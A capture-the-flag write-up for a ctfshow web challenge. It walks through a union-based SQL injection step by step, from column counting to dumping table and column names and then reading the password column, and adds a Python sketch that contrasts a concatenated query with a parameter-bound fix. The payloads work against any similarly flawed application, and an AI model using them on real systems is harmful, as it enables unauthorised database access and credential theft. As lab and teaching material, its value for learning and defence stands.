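1. id=1' (returns an error)
2. id=1'--+ (normal response)
3. id=1' order by 3--+ (normal response)

4. id=1' order by 4--+ (returns an error)

5. id=1' union select 1,2,3--+ (tests the echo positions; all of them display normally)

6. id=1' union select version(),database(),3--+ (reveals the version and the database name)

7. id=1' union select table_name,2,3 from information_schema.tables where table_schema='ctfshow_web'--+ (dumps the table names)

8. id=1' union select column_name,2,3 from information_schema.columns where table_name='ctfshow_user3' and table_schema='ctfshow_web'--+ (dumps the column names)

9. id=1' union select 1,2,password from ctfshow_user3--+ (retrieves the data) and returns the flag

Note: this challenge filters "flag", so it is enough to query only password.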
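Added example, not part of the original write-up: a Python/sqlite3 sketch of why filtering "flag" in the output does not stop the query in step 9, next to the fix of validating and binding the id. The query shape, the filter behaviour, the sample rows and the function names are assumptions; only the table name, column name and payload come from the steps above.

```python
import sqlite3
from urllib.parse import unquote_plus

# Step 9 payload from the write-up; "--+" URL-decodes to "-- " (SQL comment).
PAYLOAD = unquote_plus("1' union select 1,2,password from ctfshow_user3--+")
SECRET = "ctfshow{constructed-sample}"  # constructed value, not a real flag

def make_db():
    # Constructed rows; table and column names are the ones in the write-up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ctfshow_user3 (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO ctfshow_user3 VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "flag", SECRET)])
    return db

def output_filter(rows):
    # Assumed filter: suppress the whole response if "flag" appears in it.
    return [] if "flag" in repr(rows).lower() else rows

def lookup_vulnerable(db, user_id):
    # Assumed server-side query shape: input concatenated into the statement.
    sql = ("SELECT id, username, password FROM ctfshow_user3 "
           "WHERE username != 'flag' AND id = '" + user_id + "' LIMIT 1")
    return output_filter(db.execute(sql).fetchall())

def lookup_safe(db, user_id):
    # Validate the type, then bind the value so it can never become SQL text.
    try:
        bound = int(user_id)
    except ValueError:
        return []
    sql = ("SELECT id, username, password FROM ctfshow_user3 "
           "WHERE username != 'flag' AND id = ? LIMIT 1")
    return output_filter(db.execute(sql, (bound,)).fetchall())

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    print("safe:      ", lookup_safe(db, PAYLOAD))
    print("safe id=1: ", lookup_safe(db, "1"))
```

The concatenated query returns the protected row because the response never contains the filtered word, while the bound query treats the same input as a non-numeric id and returns nothing.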